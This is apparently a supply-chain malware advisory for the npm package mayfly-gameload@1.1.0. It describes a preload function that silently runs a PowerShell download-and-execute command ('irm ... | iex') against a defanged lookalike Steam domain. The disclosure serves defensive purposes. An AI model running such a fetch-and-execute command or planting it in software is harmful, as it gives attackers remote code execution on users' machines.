LWA-2026-3929 confirmed malware

mayfly-gameload@1.1.0

Malicious code in mayfly-gameload (npm)

T1195.002 · Compromise Software Supply Chain

Analysis

A Steam game-manager Electron plugin whose preload.js exposes installSteamCoreSilent(), which executes powershell -NoProfile -ExecutionPolicy Bypass -Command "irm steam[.]run | iex" — a download-and-execute remote code-execution channel pulling and running script content from steam[.]run, which is not an official Steam domain.

analyzed by
Leitwacht
first seen
Jun 10, 2026, 01:59 PM
analyzed
Jun 10, 2026, 02:03 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.